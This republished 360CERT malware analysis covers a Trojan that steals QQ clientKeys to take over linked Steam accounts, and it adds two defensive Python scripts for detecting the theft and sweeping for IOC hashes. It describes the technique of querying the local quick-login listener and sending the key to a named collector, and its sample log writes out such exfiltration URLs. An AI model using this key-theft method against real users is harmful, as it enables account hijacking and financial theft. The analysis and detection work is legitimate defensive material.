
Analysis report: a new Steam account-stealing Trojan and the industry chain behind it

2025-03-29 Update. From: SLTechnology News&Howtos, Internet Technology


Shulou (Shulou.com) 06/01 Report

This article reproduces 360CERT's analysis of a new Trojan that steals Steam accounts, and of the underground industry chain that trades in them, together with the mitigation advice from the original report.

Report author: 360CERT (Core Security Division, 360).

0x00 Preface

PUBG: PLAYERUNKNOWN'S BATTLEGROUNDS has sat at the top of the Steam sales chart since its launch, which shows how popular the game is. Players have joined the "chicken-eating army" in droves, but the game costs 98 yuan in the Steam store before anyone can start "eating chicken". Underground operators spotted this "business opportunity" and turned on the Steam accounts in players' hands, aiming to profit by stealing Steam account data and selling it.

Figure: listings in the "mailbox data" forum.

We also found these operators hawking stolen Steam data in Baidu Tieba forums and QQ groups; the "mailbox data" forum in particular carries a large volume of such listings. At the same time, our cloud security monitoring recently caught a number of them distributing an account-stealing Trojan disguised as game "silencer" tools, cheat plug-ins and network accelerators. Once the Trojan runs it can steal the user's QQ number and the dynamic skey.

For convenience, Tencent lets a PC with the QQ client logged in use "quick login" to Tencent web properties without retyping a password. During this flow a key is generated that acts as a second identity credential for the QQ account. Whoever holds the key can impersonate the user: log in to QQ Mail, open Qzone (photo albums, diaries, posts and "shuoshuo" updates), Weibo and Tenpay, and query the Q-coin balance.

Figure: tool that logs in to QQ Mail with a stolen QQkey.

The criminals who spread the Trojan disguised as a Steam plug-in use the key to quick-login to the victim's QQ Mail, then take over the Steam account bound to that mailbox along with whatever assets it holds.

360CERT analyzed this issue and assesses its impact as serious. The relevant report has been made public, and affected users are advised to evaluate remediation as soon as possible.

0x01 Industry chain analysis

We contacted one of the "dealers" in the forum and tried to reconstruct the entire account-theft industry chain.

During the conversation the "dealer" showed us the tools and test data used to steal Steam accounts. From the tools we could see that the two main channels they use to receive stolen QQkeys are Tencent Enterprise Mail and ASP web receivers.

Figure: account-stealing Trojan generator and QQKEY logger.

The "dealer" also quoted the going prices for these tools and their source code. The Easy Language (易语言) source for the complete Trojan generator sells for 1500 yuan; buyers who cannot work with Easy Language source instead pay around 800 yuan for a pre-built QQKey stealer generator; even the login tool used to exploit a captured QQKey costs 400 yuan.

We tested whether the Trojan could evade 360. The dealer claimed it "passes 360", but the file was detected and quarantined by QVM the moment it was downloaded. In fact the technical bar for the Trojan is low. What matters most in this business is the volume of harvested accounts, and in later conversation we learned that their main effort goes into traffic-driving and distribution; the dealer again showed us the "treasure book" of their trade, their distribution playbook.

Finally, we reconstructed this black-market chain as shown in the figure below:

0x02 Stealing the QQkey

From the samples captured recently, we found that this family of Trojans uses two main techniques to steal the QQkey.

Method 1: stealing the QQKey through QQ quick login

The Trojan requests http://localhost.ptlogin2.qq.com:4300/[url], the local quick-login listener served by the running QQ client (the host name is a Tencent domain that resolves to the loopback address, so any process on the machine can call it), extracts the clientKey from the Set-Cookie header of the response, and sends it to the operator's server (464690486.blkj.tk).

The operator's server receives the QQkey via a GET request to qqkey.php and stores it. The fields transmitted are the QQ number, the QQ nickname and the QQkey.

Figure: sending the QQ number and login key to the designated server.

Figure: the same information is also sent to a designated mailbox.
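The exchange just described gives a responder a concrete thing to look for: a process that talks to the loopback quick-login listener and then, shortly afterwards, sends a long key-like value to a non-Tencent host. The block below is an added detection example written for this article, not code from 360CERT or from the Trojan. The log line format, the process IDs, the QQ number, the key value and the quick-login path in the sample are all constructed; the collector host is the one named in the report, and the query-parameter names treated as suspicious are assumptions, since the report only says which fields qqkey.php receives, not what they are called.

```python
"""Detect the QQ quick-login clientKey theft pattern in HTTP proxy/EDR logs.

Added example for this article; not code from 360CERT or from the Trojan.
Log format and the exfil parameter names are constructed assumptions.
"""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Quick-login listener named in the report. It resolves to loopback and is
# served by the QQ client, so any local process can ask it for a clientKey.
QUICKLOGIN_HOST = "localhost.ptlogin2.qq.com"
QUICKLOGIN_PORT = 4300

# ASSUMPTION: the report says qqkey.php receives the QQ number, nickname and
# key over GET but does not name the fields; these are plausible names only.
SUSPECT_PARAMS = {"qq", "uin", "name", "nick", "key", "qqkey", "skey", "clientkey"}

# An outbound request is correlated with a quick-login call from the same
# process only inside this window; tune it to your environment.
WINDOW_SECONDS = 300

# Constructed log format: "<ISO timestamp> pid=<pid> <METHOD> <url>"
LOG_RE = re.compile(r"^(\S+) pid=(\d+) (GET|POST) (\S+)$")

# Constructed sample lines (not real traffic). The collector host on the second
# line is the one named in the report; everything else is made up.
SAMPLE_LOG = """\
2018-03-30T10:00:01 pid=4120 GET http://localhost.ptlogin2.qq.com:4300/made_up_path?callback=cb
2018-03-30T10:00:02 pid=4120 GET http://464690486.blkj.tk/qqkey.php?qq=123456789&name=victim&key=00112233445566778899aabbccddeeff
2018-03-30T10:00:05 pid=2212 GET https://store.steampowered.com/
2018-03-30T10:00:06 pid=2212 GET https://cdn.example.invalid/asset?v=00112233445566778899aabbccddeeff0011
2018-03-30T10:02:09 pid=4120 GET http://collector.example.invalid/collect?u=123456789&k=ffffffffffffffffffffffffffffffff
2018-03-30T10:00:07 pid=3300 GET http://localhost.ptlogin2.qq.com:4300/made_up_path
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, pid, method, url = m.groups()
    return {"ts": datetime.fromisoformat(ts), "pid": int(pid),
            "method": method, "url": urlsplit(url)}


def looks_like_key(value):
    """Heuristic for clientKey-style tokens: a long unbroken run of token characters."""
    return len(value) >= 32 and re.fullmatch(r"[A-Za-z0-9+/=_-]+", value) is not None


def is_tencent_host(host):
    """Requests to Tencent's own properties are the legitimate consumers of the key."""
    return host.endswith(".qq.com") or host.endswith(".tencent.com")


def find_clientkey_exfil(log_text):
    """Correlate quick-login calls with later outbound requests that carry a key."""
    last_quicklogin = {}  # pid -> timestamp of its most recent quick-login call
    findings = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        u = ev["url"]
        host = u.hostname or ""
        port = u.port or (443 if u.scheme == "https" else 80)

        if host == QUICKLOGIN_HOST and port == QUICKLOGIN_PORT:
            last_quicklogin[ev["pid"]] = ev["ts"]  # this process now holds a key
            continue
        if is_tencent_host(host):
            continue

        params = parse_qs(u.query)
        named_hits = [k for k in params if k.lower() in SUSPECT_PARAMS]
        key_values = [v for vals in params.values() for v in vals if looks_like_key(v)]
        recent_login = (ev["pid"] in last_quicklogin and
                        (ev["ts"] - last_quicklogin[ev["pid"]]).total_seconds() <= WINDOW_SECONDS)

        if u.path.endswith("qqkey.php"):
            reason = "known collector endpoint qqkey.php"
        elif recent_login and (named_hits or key_values):
            reason = "quick-login call followed by outbound key-like parameter"
        else:
            continue
        findings.append({"ts": ev["ts"].isoformat(), "pid": ev["pid"],
                         "host": host, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_clientkey_exfil(SAMPLE_LOG):
        print(f)
```

On the constructed sample this flags the qqkey.php upload and the second upload from the same process to a different host, but not the CDN request from pid 2212 that happens to carry a long token, because that process never touched the quick-login listener. The correlation with the loopback call is what keeps the key-shape heuristic from drowning in false positives; on a real host the same idea maps onto EDR network events keyed by process, where the quick-login call shows up as a connection to 127.0.0.1:4300.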

Traffic to one Trojan distributor's collection site:

Note: the picture is from 360 Network Security Research Institute.

The traffic graph shows visits to the site surging from March 30, 2018; we also captured the site's access log.

The mailbox of another Trojan distributor:

As can be seen, the operator's haul was substantial.

Method 2: brute-force scanning process memory for the QQkey and uploading it to a server or mailbox

Figure: reading QQ.exe memory.

Figure: sending the QQKey to the server.

Logging in to one thief's server shows more than 2000 QQ accounts and passwords harvested in roughly half an hour.

Figure: QQKey records on the server.

New variant

In this new variant the method of obtaining the QQkey is unchanged (at present only 360 detects it in China).

The QQkey is still obtained through QQ's quick-login API, as shown below:

What has changed is the upload channel: instead of delivering the QQkey by email or to an ASP receiver, the variant uses raw socket communication. The screenshot below shows the Trojan connecting to its C2 server:

We obtained this variant's Trojan generator through technical means. It bundles fully automated QQ Mail takeover, management of the collected QQkeys and automatic generation of Trojans; the toolkit is clearly quite complete.

Traffic to the C2 server surged between April 11 and April 12, so the variant was most likely released on April 11; we blocked it thereafter. The C2 server's traffic graph is shown below:

Note: the picture is from 360 Network Security Research Institute.

0x03 IOC (file name, MD5)

12e13e.exe 55AC18FB660F726EB801B8F03F9EBC37

Wrqdfq.exe 37575D21B8CD16ABA4C3E1B3013B1E31

QQPass.exe 6CB90F793DB09FEF0077E599C6FF6F20
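A practitioner handed the three hashes above will want to sweep a host for them. The block below is an added example written for this article, not part of the 360CERT report: it walks a directory tree, hashes every file in chunks and reports exact MD5 matches separately from weaker name-only matches. The demo directory, its file contents and the extra "dropper.bin" hash it adds to the IOC set are constructed purely so the walkthrough can run offline; the three report hashes are carried through unchanged.

```python
"""Sweep a directory tree for the IOC hashes and file names from the report.

Added example for this article; not code from 360CERT. The demo tree and the
extra demo hash are constructed so the example runs offline.
"""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

# MD5 -> file name, as published in the report (hashes lower-cased for matching).
# Names are weak indicators (trivially changed); hashes match only that exact sample.
REPORT_IOCS = {
    "55ac18fb660f726eb801b8f03f9ebc37": "12e13e.exe",
    "37575d21b8cd16aba4c3e1b3013b1e31": "Wrqdfq.exe",
    "6cb90f793db09fef0077e599c6ff6f20": "QQPass.exe",
}


def md5_of_file(path, chunk=1 << 20):
    """Stream the file through MD5 so large binaries do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, iocs=REPORT_IOCS):
    """Return (hash_hits, name_hits).

    hash_hits: [(path, ioc_name)] for files whose MD5 is in `iocs` (strong match).
    name_hits: [path] for files that only share a name with an IOC (weak match,
               typically a repacked build or an unrelated file with the same name).
    """
    known_names = {name.lower() for name in iocs.values()}
    hash_hits, name_hits = [], []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = Path(dirpath) / fn
            try:
                digest = md5_of_file(p)
            except OSError:
                continue  # locked or unreadable; a real triage would log these too
            if digest in iocs:
                hash_hits.append((str(p), iocs[digest]))
            elif fn.lower() in known_names:
                name_hits.append(str(p))
    return hash_hits, name_hits


def build_demo_tree():
    """Create a constructed directory for the walkthrough; returns (root, iocs)."""
    root = Path(tempfile.mkdtemp(prefix="ioc_sweep_"))
    (root / "notes.txt").write_bytes(b"benign file\n")
    # Same name as an IOC but different content: should be a name-only hit.
    (root / "QQPass.exe").write_bytes(b"not the real sample, name match only\n")
    # Constructed stand-in for a known-bad file; its hash is added to the IOC set.
    sample = root / "sub" / "dropper.bin"
    sample.parent.mkdir()
    sample.write_bytes(b"constructed stand-in for a known-bad sample\n")
    iocs = dict(REPORT_IOCS)
    iocs[md5_of_file(sample)] = "dropper.bin (constructed demo hash)"
    return root, iocs


def demo():
    """Run the sweep over the constructed tree and clean up afterwards."""
    root, iocs = build_demo_tree()
    try:
        return sweep(root, iocs)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    hash_hits, name_hits = demo()
    print("hash matches:", hash_hits)
    print("name-only matches:", name_hits)
```

Two caveats apply when using these IOCs for real. A hash matches only the exact bytes of the analyzed sample, and the report itself notes that the generator is sold as source and as a rebuildable tool, so every freshly generated build has a different MD5; a clean sweep therefore proves little on its own. Conversely the file names are arbitrary, so a name-only hit is a lead, not a conviction. The behavioural indicators from 0x02, the loopback quick-login call and the outbound key upload, hold across rebuilds in a way the hashes do not.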

0x04 Prevention suggestions

1. Download and install "360 Security Guard" immediately to guard against this class of Trojan.

2. Do not disable the protection features of your security software in order to run game helper or cheat tools; the Trojan is distributed disguised as exactly such tools.

0x05 Summary

Our telemetry shows the number of these Trojans steadily increasing. They threaten not only users' Steam accounts but, because the stolen QQkey grants access to other QQ services, every service tied to the QQ account, and may cause users considerably larger financial losses.

Users are advised to download and install "360 Security Guard" immediately, which at the time of writing is the only domestic product that detects these samples.
